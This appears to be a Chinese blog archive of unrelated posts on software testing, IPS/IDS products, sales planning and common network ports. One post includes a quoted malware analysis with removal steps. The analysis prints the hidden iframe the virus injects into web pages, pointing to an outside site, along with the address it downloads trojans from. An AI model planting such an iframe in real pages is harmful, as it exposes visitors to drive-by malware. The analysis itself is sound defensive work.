绵绵的大箩筐

本文转自：http://www.testage.net/TestTech/PT/200612/1353.htm

性能测试就是用来测试软件在系统中的运行性能的。 性能测试可以发生在各个测试阶段中，即使是在单元层，一个单独模块的性能也可以使用白盒测试来进行评估，然而，只有当整个系统的所有成分都集成到一起之后，才能检查一个系统的真正性能。

     性能测试经常和压力测试一起进行，而且常常需要硬件和软件测试设备，这就是说，常常有必要的在一种苛刻的环境中衡量资源的使用（比如，处理器周期）。外部的测试设备可以监测测试执行，当出现情况（如中断）时记录下来。通过对系统的检测，测试者可以发现导致效率降低和系统故障的原因。


    压力测试：对系统不断施加压力的测试，是通过确定一个系统的瓶颈或者不能接收的性能点，来获得系统能提供的最大服务级别的测试。例如测试一个 Web 站点在大量的负荷下，何时系统的响应会退化或失败。 

     性能测试：在交替进行负荷和强迫测试时常用的术语。 性能测试关注的是系统的整体。它和通常所说的强度、压力/负载测试测试有密切关系。所以压力和强度测试应该于性能测试一同进行。
    举例说明：针对一个网站进行测试，模拟10到50个用户就是在进行常规性能测试，用户增加到1000乃至上万就变成了压力/负载测试。如果同时对系统进行大量的数据查询操作，就包含了强度测试。

     性能测试(Performance) 正常使用的时间内系统完成一个任务需要的时间,多人同时使用的时候响应时间,在可以接受范围内.J2EE技术实现的系统在性能方面更是需要照顾的,一般原 则是3秒以下接受,3-5秒可以接受,5秒以上就影响易用性了. 如果在测试过程中发现性能问题，修复起来是非常艰难的，因为这常常意味着程序的算法不好，结构不好，或者设计有问题。因此在产品开发的开始阶段，就要考虑 到软件的性能问题

    压力测试 (Stress) 多用户情况可以考虑使用压力测试工具,建议将压力和 性能测试结合起来进行.如果有负载平衡的话还要在服务器端打开监测工具,查看服务器CPU使用率,内存占用情况, 如果有必要可以模拟大量数据输入,对硬盘的影响等等信息.如果有必要的话必须进行性能优化(软硬件都可以).

    压力测试和性能的测试的区别是在于他们不同的测试目的

    压力测试是为了发现系统能支持的最大负载，他的前提是要求系统性能处在可以接受的范围内，比如经常规定的叶面3秒钟内响应；
所以一句话概括就是：在性能可以接受的前提下，测试系统可以支持的最大负载。

     性能测试是为了检查系统的反映，运行速度等性能指标，他的前提是要求在一定负载下，如检查一个网站在100人同时在线的情况下的性能指标，每个用户是否都还可以正常的完成操作等。
概括就是：在不同负载下（负载一定）时，通过一些系统参数（如反应时间等）检查系统的运行情况；
比如我们说某个网站的性能差，严格上应该说‘在N人同时在线情况下，这个站点性能很差）

    总之，就像一个方程式：综合性能=压力数*性能指数，
    综合性能是固定的：
    压力测试是为了得到性能指数最小时候（可以接受的最小指数）最大的压力数
     性能测试是为了得到压力数确定下的性能指数

最近总有些朋友跟我聊起IPS的发展的问题，IPS应该具备哪些功能，IPS今后技术发展方向，IPS能解决什么问题，IPS跟IDS如何区分定位......，最近我接触了不少IPS的用户，根据跟他们的接触交流，了解到他们的一些对IPS的实际期望，主要分为两部分：

    其一，是IPS的有效 控制。这也是IPS区别于IDS的最重要的一点，IDS追求大而全，即最大限度发现攻击行为，让用户最全面了解网络风险；而IPS作为网关设备，要追求精 确阻断，即少而精的入侵防御，不能因为误报阻断导致正常业务中断。另一方面，IPS更注重对网络应用的控制，譬如P2P下载、在线流媒体、聊天工具、股 票、网游等应用，不到要能够及时了解网络中哪些节点、哪些机器或者哪些人在做这方面的网路应用，而且还要可以对这些应用进行有效的控制，所以有效控制将是IPS的一个重要支柱点；

    其二，是IPS的有效呈现。我们不但希望IPS可以对网络应用进行有效控制，同时也希望通过IPS清晰了解自己的网络应用状况，譬如我的网络流量曲线，都 有谁、哪些IP什么时间在线聊天或者游戏或者炒股或者P2P了，我希望了解我的带宽占用中排在前10名的网络应用是什么，我希望得到上班时间内网络聊天排名前10位的IP等等，换句话说，就是要求IPS的日志查询灵活，报表内容丰富、各式多样方便

入侵防御能力是IPS永恒的本能，但是有效控制和有效呈现将是IPS今后的发展趋势

为了验证产品功能，在自己的机器上安装使用了Emule、BitTorrent等P2P工具，结果不出所料，不到一天的功夫，rising就有好几回木马报告，接着奇怪发现我的系统时间怎么是1990年了？（但是日期没变），在接下来发现我的所有可执行文件的属性中的公司一栏全部变成“番茄花园“了，而且每次运行可执行文件都会产生一个文件名相同后缀为eve的文件，恐慌ing

还好及时在看到一篇“【原创】修改系统时间并感染exe成为番茄花园的病毒的处理(提供专杀）“的帖子，才使问题得以解救，真是感谢搂主啊

******************原帖内容********************

今天发现此种病毒求助者见多 收到样本后 利马测试了一下
该病毒就是前些日子流行的 修改系统时间的病毒之变种
此次变种可谓是集N种破坏性病毒之大成了
主要破坏功能有：1.感染exe 并使得被感染的exe的公司等属性变为 番茄花园
2.感染html asp 等文件 插入恶意代码
3.通过双击磁盘启动
4.下载木马，盗取网游帐号
5.修改注册表 使系统无法显示隐藏文件
6.通过hook API 函数 导致任务管理器中 无法看见其进程
分析报告如下：
File: rising.exe
Size: 64775 bytes
File Version: 1.00
MD5: 86311B37D938BB35645E7B092014DD63
SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3
CRC32: 88ABBD9B

rising.exe 运行后 首先释放一个rising.eve的文件 然后由rising.exe启动他
之后 释放139CA82A.EXE 139CA82A.dll（随机的8个数字字母组合成的文件名）到系统文件夹
注册服务139CA82A.EXE
139CA82A.EXE控制winlogon进程 使得139CA82A.dll插入几乎所有进程

释放rising.exe 和autorun.inf 到每个分区 使得双击磁盘启动
感染 除系统分区外的exe文件 使得其公司名全变为 番茄花园
感染 html asp 等文件 在其后面插入代码
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>

修改系统时间 随机把年份往前调 月，日不变
修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue:
值为 0x00000000
导致无法显示临时文件

rising.exe 还会hook 多个 API函数 使其进程在任务管理器中隐藏

使用Explorer.exe连接网络 61.152.92.98:80下载木马
下载的木马一般为K117815XXXXX.exe
XXXXX代表随机
到系统文件夹

由于 每台机器上下载的木马的名称不同 但最后结果相同 所以中间释放的过程省略
最后 这些木马运行后分别释放了如下文件
C:\WINDOWS\system32\buchehuo.exe（创建了服务inetsvr）

C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe

C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe

C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe

C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe

C:\WINDOWS\system32\winsock.exe

临时文件夹下 释放upxdnd.exe和upxdnd.dll

解决办法：
安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)

首先把系统日期 改回来
然后打开sreng
启动项目 注册表 删除如下项目
<upxdnd><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<cmdbs><C:\WINDOWS\cmdbs.exe> []
<mppds><C:\WINDOWS\mppds.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<winform><C:\WINDOWS\winform.exe> []

“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，
选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：
139CA82A / 139CA82A
Wireless Zero Conflguration / inetsvr

把下面的 代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

双击1.reg把这个注册表项导入

然后双击我的电脑－工具－文件夹选项－查看－显示所有文件和文件夹，把“隐藏受保护的系统文件”的勾去掉。

右键 点击C盘 点击右键菜单中的“打开”打开C盘 （千万不要双击）（如图）
删除 如下文件
C:\rising.exe
C:\autorun.inf
C:\WINDOWS\system32\buchehuo.exe
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
C:\WINDOWS\unspapik.txt
C:\WINDOWS\wiasevct.txt
C:\WINDOWS\wiasvctr.txt
C:\WINDOWS\ganran.txt
C:\WINDOWS\system32\139CA82A.DLL（随机的8个数字字母组合成的文件名）
C:\WINDOWS\system32\139CA82A.EXE（随机的8个数字字母组合成的文件名）
C:\WINDOWS\system32\K117815XXXXX.exe（XXXXX代表随机数字）
清空C:\Documents and Settings\用户名\Local Settings\Temp

右键 点击分别打开系统分区以外的分区 还是点击右键菜单中的“打开” （千万不要双击）
删除每个分区下面的autorun.inf和rising.exe文件

最后使用专杀 全盘杀毒
下载地址

http://free.ys168.com/?newcenturysun 我的网盘
威金熊猫番茄专杀 下面的威金熊猫通用终结器
声明 此专杀 只是修复exe文件 而不针对 rising.exe文件 以及他们下载的木马 所以必须在彻底清除了 rising.exe 以及 所有木马后在安全模式下使用

sreng下载地址
http://www.kztechs.com/sreng/download.html

今天参加了“2006存储中国峰会”，主要是想了解一下国家的相关政策、存储发展方向、存储市场情况、存储产品发展等方面信息，总体感觉各嘉宾的主题演讲还是比较精彩的，尤其是国务院信息化办公室司长赵小凡的演讲更是精彩，以下是断断续续记录下来的一些演讲的亮点或观点：

>国务院信息化办公室的“34号文”已经在解密过程中，预计今年上半年即可发布

>信息的重要性包括：1）信息资源作为生产要素、无形资产、社会财富，与能源、材料等物质资源同等重要；2）信息资源的是不可替代的；3）......没记下来

>关于信息资源市场——信息资源可作为商品进行交换

>在国内，政府是最大的信息资源拥有者，政府对信息资源的利用分为机构内部使用、机构间共享、对外共享（如电子政务等）

                     ————国务院信息化办公室 赵小凡

>NAS、虚拟存储、加密存储       ——IBM 候淼

>快速存储（快速将DATA整合，上升为knowledge）、绿色存储（节约能源）    ——EMC 杜国强

>已经有早期的为服务器服务转变为以存储为核心的应用

>努力打造成熟的存储服务，方便犹如自来水、电           —— 富士通  周一平

>存储一体化管理，存储、榕灾的目的不是备份而是恢复      ——Commvault 徐永兴

<其他>

比较佩服EMC 的杜国强的演讲，虽然普通话很不标准，但是他的逻辑思维很清晰，通俗易懂，各种数据、例子应用的非常好，100%说明了他想要阐明的观点，唯一感到不足的是他有一个让人感觉很不舒服的口头禅“所谓的”，什么“所谓的信息化办公室”、“所谓的IBM”......，一方面让所说对象觉得不受尊重，另一方面让听者觉得挺好的东西在他看来都是浪有虚名

还有就是感觉主办方有一点听恶心的，就是中午饭自己解决，拿着一张兑换卷，必须等到下午5~6点才能兑换50元餐费，可谓“目的诚可贵，做法遭人嫌”

最近碰到的一个项目，对IDS提出了很“另类”的的需求，明确在招标要求中提出了以下2点：

1、支持异常MAC地址检查功能

2、支持监控和封禁网络中常见应用服务事件监控，例如收发邮件、数据库应用、网络聊天、流媒体、P2P软件、BT下载、网络游戏等；支持在不同时间应用的监控和封禁

其实要只是标书应答也就算了，关键是要测试功能实现，这着实让我头疼了一番。

开始的时候，测试方要求演示一下产品界面上的“MAC地址检查”功能相关菜单，我晕，真的是拿IDS当内网管理用了？我只好强调IDS的价值在于它的检测与报警能力，我们没有相关菜单，只能通过报警的方式检查MAC地址的异常状况，于是最后采用的测试用例是：修改MAC地址，察看IDS的是否能正确报警。测试结果OK

至于“支持监控和封禁网络中常见应用服务事件监控”更是内网管理产品的功能了，我在想，对IDS提出这样的要求实属强人所难，IDS的控制都是通过发reset包来实现的，然而IDS往往是接在交换机的镜像口，基本不支持发包，所以说控制、阻断功能基本无法实用，最后协商采用防火墙联动的方式来实现。测试OK

虽说这些需求对于IDS来说有些勉为其难，但是可以看出用户对终端防护方面的需求呼声，希望这对内网管理市场是一个好兆头。

2006年7月4日信息产业部发布的《网络入侵检测系统技术要求》

〈〈〈从这里下载〉〉〉

已经从PM出来半年多了，之所以要写这篇小文章，有两个原因，其一就是此时此刻出差在外，事办完了，还有些富裕时间；其二就是将以前的一些自己的做事方法记录下来，以便他日参考。言归正传......

对于一个新产品，公司没有自己的历史数据，销售人员也很难把握的情况下，作为产品经理，该如何制定新产品的来年销售计划，也就是销售目标（任务）？在市场营销、产品管理、MBA等书籍中会有很多种分析方法，但是就个人认为有2种最简单，可操作性强的方法：

一、顺推法
所谓顺推，就是从大盘入手，逐步细分，最终得到自己的产品应该占有的份额。

1、预测新产品的07年市场规模
新产品没有自己的历史数据，但是可以从全国乃至全球的同类产品的市场份额中逐步分解，得到新产品的历史销售规模（有连续3年以上的数据最），根据历史增长率和业界增长率估算出07年的规模，譬如某类产品（如放垃圾邮件产品）全国销售的历史数据如2004年8000万、2005年1.23亿、2006年1.80亿，就是说大概有50%增长率，而IT也的年增长率大概在30%左右，则我们可以用平均值40%来计算该产品07年的销售规模，大约2.52亿。

2、对同一领域的竞争产品进行分析

从历年的各竞争厂家的格局（市场瓜分率），来将07年的份额进行分摊，然后确立自己的一个竞争目标（或者是参照厂商、或者是市场占有份额目，得到自己的产品应该在07年做到销售目标。还是上面的例子，假如该产品大概有20个竞争品牌，A占40%、B20%、C15%、其他25%，如果我们分析觉得自己的公司规模、产品质量、营销能力都跟C差不多，或者说要强一些，那么我们就应该将C作为我们的目标，我们的产品07年的份额达到10~15%，则新产品07年的销售额计划就出来了，2520~3780万。

3、目标的可行性分析

从公司整体实力，产品差异化，等方面分析一下这个目标的可行性，然后还要给出具体实现目标的方法手段。


二、逆推法
所谓逆推法，就是从各个单元分析，最终汇总得到新产品销售额。这里边还可以具体分成2种操作方法：

1、销售估算法
    即逐一走访或者电话调查公司直属的销售人员和代理商，让他们自己对该产品的来年销售额进行估算，然后汇总得到公司全年的销售计划。这种方法操作起来比较难，尤其是跟销售人员打交道，爱理不理的态度很让人难受，这就得考验产品经理的个人魅力了，但是这却是一种比较实际的行之有效的计划额，因为销售人员一般都会量力而估，不会有太多的水分。

2、需求估算法
就是从产品需求方面进行分析，最终得到新产品的销售计划。还是以垃圾邮件产品为例，我么可以这么来考虑，全国大概有多少邮件服务器？（这个从每年的中国互联网用户分析报告中都有），每个省、地区有多少？并根据该地区的经济水平和IT化水平估算出购买防垃圾邮件产品的比率会有多少？目前大概会有多少是已经购买了该类产品？......等等，从各方面详细分析后，我们也能汇总得到全国该类产品的销售总额。

后边的分析方法就跟顺推法一样即可。

在上网的时候，我们经常会看到“端口”这个词，也会经常用到端口号，比如在FTP地址后面增加的“?Yuml;21”，21就表示端口号。那么端口到底是什么意思 呢？怎样查看端口号呢？一个端口是否成为网络恶意攻击的大门呢？，我们应该如何面对形形色色的端口呢？下面就将介绍这方面的内容,以供大家参考。

21端口：21端口主要用于FTP（File Transfer Protocol，文件传输协议）服务。

端口说明：21端口主要用于FTP（File Transfer Protocol，文件传输协议）服务，FTP服务主要是为了在两台计算机之间实现文件的上传与下载，一台计算机作为FTP客户端，另一台计算机作为 FTP服务器，可以采用匿名（anonymous）登录和授权用户名与密码登录两种方式登录FTP服务器。目前，通过FTP服务来实现文件的传输是互联网 上上传、下载文件最主要的方法。另外，还有一个20端口是用于FTP数据传输的默认端口号。

在Windows中可以通过Internet信息服务（IIS）来提供FTP连接和管理，也可以单独安装FTP服务器软件来实现FTP功能，比如常见的FTP Serv-U。

操作建议：因为有的FTP服务器可以通过匿名登录，所以常常会被黑客利用。另外，21端口还会被一些木马利用，比如Blade Runner、FTP Trojan、Doly Trojan、WebEx等等。如果不架设FTP服务器，建议关闭21端口。

23端口：23端口主要用于Telnet（远程登录）服务，是Internet上普遍采用的登录和仿真程序。

端口说明：23端口主要用于Telnet（远程登录）服务，是Internet上普遍采用的登录和仿真程序。同样需要设置客户端和服务器端，开启 Telnet服务的客户端就可以登录远程Telnet服务器，采用授权用户名和密码登录。登录之后，允许用户使用命令提示符窗口进行相应的操作。在 Windows中可以在命令提示符窗口中，键入“Telnet”命令来使用Telnet远程登录。

操作建议：利用Telnet服务，黑客可以搜索远程登录Unix的服务，扫描操作系统的类型。而且在Windows 2000中Telnet服务存在多个严重的漏洞，比如提升权限、拒绝服务等，可以让远程服务器崩溃。Telnet服务的23端口也是TTS（Tiny Telnet Server）木马的缺省端口。所以，建议关闭23端口。

25端口：25端口为SMTP（Simple Mail Transfer Protocol，简单邮件传输协议）服务器所开放，主要用于发送邮件，如今绝大多数邮件服务器都使用该协议。
端口说明：25端口为SMTP（Simple Mail Transfer Protocol，简单邮件传输协议）服务器所开放，主要用于发送邮件，如今绝大多数邮件服务器都使用该协议。比如我们在使用电子邮件客户端程序的时候， 在创建账户时会要求输入SMTP服务器地址，该服务器地址默认情况下使用的就是25端口。

端口漏洞：

1. 利用25端口，黑客可以寻找SMTP服务器，用来转发垃圾邮件。

2. 25端口被很多木马程序所开放，比如Ajan、Antigen、Email Password Sender、ProMail、trojan、Tapiras、Terminator、WinPC、WinSpy等等。拿WinSpy来说，通过开放25 端口，可以监视计算机正在运行的所有窗口和模块。

操作建议：如果不是要架设SMTP邮件服务器，可以将该端口关闭。

53端口：53端口为DNS（Domain Name Server，域名服务器）服务器所开放，主要用于域名解析，DNS服务在NT系统中使用的最为广泛。

端口说明：53端口为DNS（Domain Name Server，域名服务器）服务器所开放，主要用于域名解析，DNS服务在NT系统中使用的最为广泛。通过DNS服务器可以实现域名与IP地址之间的转换，只要记住域名就可以快速访问网站。

端口漏洞：如果开放DNS服务，黑客可以通过分析DNS服务器而直接获取Web服务器等主机的IP地址，再利用53端口突破某些不稳定的防火墙，从而实施攻击。近日，美国一家公司也公布了10个最易遭黑客攻击的漏洞，其中第一位的就是DNS服务器的BIND漏洞。

操作建议：如果当前的计算机不是用于提供域名解析服务，建议关闭该端口。

67、68端口：67、68端口分别是为Bootp服务的Bootstrap Protocol Server（引导程序协议服务端）和Bootstrap Protocol Client（引导程序协议客户端）开放的端口。

端口说明：67、68端口分别是为Bootp服务的Bootstrap Protocol Server（引导程序协议服务端）和Bootstrap Protocol Client（引导程序协议客户端）开放的端口。Bootp服务是一种产生于早期Unix的远程启动协议，我们现在经常用到的DHCP服务就是从 Bootp服务扩展而来的。通过Bootp服务可以为局域网中的计算机动态分配IP地址，而不需要每个用户去设置静态IP地址。

端口漏洞：如果开放Bootp服务，常常会被黑客利用分配的一个IP地址作为局部路由器通过“中间人”（man-in-middle）方式进行攻击。

操作建议：建议关闭该端口。
69端口：TFTP是Cisco公司开发的一个简单文件传输协议，类似于FTP。

端口说明：69端口是为TFTP（Trival File Tranfer Protocol，次要文件传输协议）服务开放的，TFTP是Cisco公司开发的一个简单文件传输协议，类似于FTP。不过与FTP相比，TFTP不具 有复杂的交互存取接口和认证控制，该服务适用于不需要复杂交换环境的客户端和服务器之间进行数据传输。

端口漏洞：很多服务器和Bootp服务一起提供TFTP服务，主要用于从系统下载启动代码。可是，因为TFTP服务可以在系统中写入文件，而且黑客还可以利用TFTP的错误配置来从系统获取任何文件。

操作建议：建议关闭该端口。

79端口：79端口是为Finger服务开放的，主要用于查询远程主机在线用户、操作系统类型以及是否缓冲区溢出等用户的详细信息。

端口说明：79端口是为Finger服务开放的，主要用于查询远程主机在线用户、操作系统类型以及是否缓冲区溢出等用户的详细信息。比如要显示远程计算机 www.abc.com上的user01用户的信息，可以在命令行中键入“finger user01@www.abc.com”即可。

端口漏洞：一般黑客要攻击对方的计算机，都是通过相应的端口扫描工具来获得相关信息，比如使用“流光”就可以利用79端口来扫描远程计算机操作系统版本， 获得用户信息，还能探测已知的缓冲区溢出错误。这样，就容易遭遇到黑客的攻击。而且，79端口还被Firehotcker木马作为默认的端口。

操作建议：建议关闭该端口。

80端口：80端口是为HTTP（HyperText Transport Protocol，超文本传输协议）开放的，这是上网冲浪使用最多的协议，主要用于在WWW（World Wide Web，万维网）服务上传输信息的协议。

端口说明：80端口是为HTTP（HyperText Transport Protocol，超文本传输协议）开放的，这是上网冲浪使用最多的协议，主要用于在WWW（World Wide Web，万维网）服务上传输信息的协议。我们可以通过HTTP地址加“:80”（即常说的“网址”）来访问网站的，比如http: //www.cce.com.cn:80，因为浏览网页服务默认的端口号是80，所以只要输入网址，不用输入“:80”。

端口漏洞：有些木马程序可以利用80端口来攻击计算机的，比如Executor、RingZero等。

操作建议：为了能正常上网冲浪，我们必须开启80端口。

99端口：99端口是用于一个名为“Metagram Relay”（亚对策延时）的服务，该服务比较少见，一般是用不到的。

端口说明：99端口是用于一个名为“Metagram Relay”（亚对策延时）的服务，该服务比较少见，一般是用不到的。

端口漏洞：虽然“Metagram Relay”服务不常用，可是Hidden Port、NCx99等木马程序会利用该端口，比如在Windows 2000中，NCx99可以把cmd．exe程序绑定到99端口，这样用Telnet就可以连接到服务器，随意添加用户、更改权限。

操作建议：建议关闭该端口。
109、110端口：109端口是为POP2（Post Office Protocol Version 2，邮局协议2）服务开放的，110端口是为POP3（邮件协议3）服务开放的，POP2、POP3都是主要用于接收邮件的。

端口说明：109端口是为POP2（Post Office Protocol Version 2，邮局协议2）服务开放的，110端口是为POP3（邮件协议3）服务开放的，POP2、POP3都是主要用于接收邮件的，目前POP3使用的比较多， 许多服务器都同时支持POP2和POP3。客户端可以使用POP3协议来访问服务端的邮件服务，如今ISP的绝大多数邮件服务器都是使用该协议。在使用电 子邮件客户端程序的时候，会要求输入POP3服务器地址，默认情况下使用的就是110端口

端口漏洞：POP2、POP3在提供邮件接收服务的同时，也出现了不少的漏洞。单单POP3服务在用户名和密码交换缓冲区溢出的漏洞就不少于20个，比如 WebEasyMail POP3 Server合法用户名信息泄露漏洞，通过该漏洞远程攻击者可以验证用户账户的存在。另外，110端口也被ProMail trojan等木马程序所利用，通过110端口可以窃取POP账号用户名和密码。

操作建议：如果是执行邮件服务器，可以打开该端口。

111端口：111端口是SUN公司的RPC（Remote Procedure Call，远程过程调用）服务所开放的端口，主要用于分布式系统中不同计算机的内部进程通信，RPC在多种网络服务中都是很重要的组件。

端口说明：111端口是SUN公司的RPC（Remote Procedure Call，远程过程调用）服务所开放的端口，主要用于分布式系统中不同计算机的内部进程通信，RPC在多种网络服务中都是很重要的组件。常见的RPC服务 有rpc．mountd、NFS、rpc．statd、rpc．csmd、rpc．ttybd、amd等等。在Microsoft的Windows中，同 样也有RPC服务。

　

端口漏洞：SUN RPC有一个比较大漏洞，就是在多个RPC服务时xdr＿array函数存在远程缓冲溢出漏洞，通过该漏洞允许攻击者传递超

113端口：113端口主要用于Windows的“Authentication Service”（验证服务）。

端口说明：113端口主要用于Windows的“Authentication Service”（验证服务），一般与网络连接的计算机都运行该服务，主要用于验证TCP连接的用户，通过该服务可以获得连接计算机的信息。在 Windows 2000/2003 Server中，还有专门的IAS组件，通过该组件可以方便远程访问中进行身份验证以及策略管理。

端口漏洞：113端口虽然可以方便身份验证，但是也常常被作为FTP、POP、SMTP、IMAP以及IRC等网络服务的记录器，这样会被相应的木马程序 所利用，比如基于IRC聊天室控制的木马。另外，113端口还是Invisible Identd Deamon、Kazimas等木马默认开放的端口。

操作建议：建议关闭该端口。
119端口：119端口是为“Network News Transfer Protocol”（网络新闻组传输协议，简称NNTP）开放的。

端口说明：119端口是为“Network News Transfer Protocol”（网络新闻组传输协议，简称NNTP）开放的，主要用于新闻组的传输，当查找USENET服务器的时候会使用该端口。

端口漏洞：著名的Happy99蠕虫病毒默认开放的就是119端口，如果中了该病毒会不断发送电子邮件进行传播，并造成网络的堵塞。

操作建议：如果是经常使用USENET新闻组，就要注意不定期关闭该端口。

135端口：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务。

端口说明：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地

执行远程计算机上的代码；使用DCOM可以通过网络直接进行通信，能够跨包括HTTP协议在内的多种网络传输。

端口漏洞：相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒，该病毒就是利用RPC漏洞来攻击计算机的。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞，该漏洞是由于错误 地处理格式不正确的消息造成的。该漏洞会影响到RPC与DCOM之间的一个接口，该接口侦听的端口就是135。

操作建议：为了避免“冲击波”病毒的攻击，建议关闭该端口。

137端口：137端口主要用于“NetBIOS Name Service”（NetBIOS名称服务）。

端口说明：137端口主要用于“NetBIOS Name Service”（NetBIOS名称服务），属于UDP端口，使用者只需要向局域网或互联网上的某台计算机的137端口发送一个请求，就可以获取该计算 机的名称、注册用户名，以及是否安装主域控制器、IIS是否正在运行等信息。

端口漏洞：因为是UDP端口，对于攻击者来说，通过发送请求很容易就获取目标计算机的相关信息，有些信息是直接可以被利用，并分析漏洞的，比如IIS服 务。另外，通过捕获正在利用137端口进行通信的信息包，还可能得到目标计算机的启动和关闭的时间，这样就可以利用专门的工具来攻击。

操作建议：建议关闭该端口。
139端口：139端口是为“NetBIOS Session Service”提供的，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。

　

端口说明：139端口是为“NetBIOS Session Service”提供的，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。在Windows中要在局域网中进行文件的共享， 必须使用该服务。比如在Windows 98中，可以打开“控制面板”，双击“网络”图标，在“配置”选项卡中单击“文件及打印共享”按钮选中相应的设置就可以安装启用该服务；在Windows 2000/XP中，可以打开“控制面板”，双击“网络连接”图标，打开本地连接属性；接着，在属性窗口的“常规”选项卡中选择“Internet协议 （TCP/IP）”，单击“属性”按钮；然后在打开的窗口中，单击“高级”按钮；在“高级TCP/IP设置”窗口中选择“WINS”选项卡，在 “NetBIOS设置”区域中启用TCP/IP上的NetBIOS。

端口漏洞：开启139端口虽然可以提供共享服务，但是常常被攻击者所利用进行攻击，比如使用流光、SuperScan等端口扫描工具，可以扫描目标计算机的139端口，如果发现有漏洞，可以试图获取用户名和密码，这是非常危险的。

操作建议：如果不需要提供文件和打印机共享，建议关闭该端口。

143端口：143端口主要是用于“Internet Message Access Protocol”v2（Internet消息访问协议，简称IMAP）。

端口说明：143端口主要是用于“Internet Message Access Protocol”v2（Internet消息访问协议，简称IMAP），和POP3一样，是用于电子邮件的接收的协议。通过IMAP协议我们可以在不接 收邮件的情况下，知道信件的内容，方便管理服务器中的电子邮件。不过，相对于POP3协议要负责一些。如今，大部分主流的电子邮件客户端软件都支持该协 议。

端口漏洞：同POP3协议的110端口一样，IMAP使用的143端口也存在缓冲区溢出漏洞，通过该漏洞可以获取用户名和密码。另外，还有一种名为“admv0rm”的Linux蠕虫病毒会利用该端口进行繁殖。

操作建议：如果不是使用IMAP服务器操作，应该将该端口关闭。

161端口：161端口是用于“Simple Network Management Protocol”（简单网络管理协议，简称SNMP）。

端口说明：161端口是用于“Simple Network Management Protocol”（简单网络管理协议，简称SNMP），该协议主要用于管理TCP/IP网络中的网络协议，在Windows中通过SNMP服务可以提供 关于TCP/IP网络上主机以及各种网络设备的状态信息。目前，几乎所有的网络设备厂商都实现对SNMP的支持。

在Windows 2000/XP中要安装SNMP服务，我们首先可以打开“Windows组件向导”，在“组件”中选择“管理和监视工具”，单击“详细信息”按钮就可以看到“简单网络管理协议（SNMP）”，选中该组件；然后，单击“下一步”就可以进行安装。

端口漏洞：因为通过SNMP可以获得网络中各种设备的状态信息，还能用于对网络设备的控制，所以黑客可以通过SNMP漏洞来完全控制网络。

操作建议：建议关闭该端口。
443端口：43端口即网页浏览端口，主要是用于HTTPS服务，是提供加密和通过安全端口传输的另一种HTTP。

端口说明：443端口即网页浏览端口，主要是用于HTTPS服务，是提供加密和通过安全端口传输的另一种HTTP。在一些对安全性要求较高的网站，比如银 行、证券、购物等，都采用HTTPS服务，这样在这些网站上的交换信息其他人都无法看到，保证了交易的安全性。网页的地址以https://开始，而不是 常见的http://。

　

端口漏洞：HTTPS服务一般是通过SSL（安全套接字层）来保证安全性的，但是SSL漏洞可能会受到黑客的攻击，比如可以黑掉在线银行系统，盗取信用卡账号等。

操作建议：建议开启该端口，用于安全性网页的访问。另外，为了防止黑客的攻击，应该及时安装微软针对SSL漏洞发布的最新安全补丁。

554端口：554端口默认情况下用于“Real Time Streaming Protocol”（实时流协议，简称RTSP）。

端口说明：554端口默认情况下用于“Real Time Streaming Protocol”（实时流协议，简称RTSP），该协议是由RealNetworks和Netscape共同提出的，通过RTSP协议可以借助于 Internet将流媒体文件传送到RealPlayer中播放，并能有效地、最大限度地利用有限的网络带宽，传输的流媒体文件一般是Real服务器发布 的，包括有.rm、.ram。如今，很多的下载软件都支持RTSP协议，比如FlashGet、影音传送带等等。

端口漏洞：目前，RTSP协议所发现的漏洞主要就是RealNetworks早期发布的Helix Universal Server存在缓冲区溢出漏洞，相对来说，使用的554端口是安全的。

操作建议：为了能欣赏并下载到RTSP协议的流媒体文件，建议开启554端口。

1024端口：1024端口一般不固定分配给某个服务，在英文中的解释是“Reserved”（保留）。

端口说明：1024端口一般不固定分配给某个服务，在英文中的解释是“Reserved”（保留）。之前，我们曾经提到过动态端口的范围是从 1024～65535，而1024正是动态端口的开始。该端口一般分配给第一个向系统发出申请的服务，在关闭服务的时候，就会释放1024端口，等待其他 服务的调用。

端口漏洞：著名的YAI木马病毒默认使用的就是1024端口，通过该木马可以远程控制目标计算机，获取计算机的屏幕图像、记录键盘事件、获取密码等，后果是比较严重的。

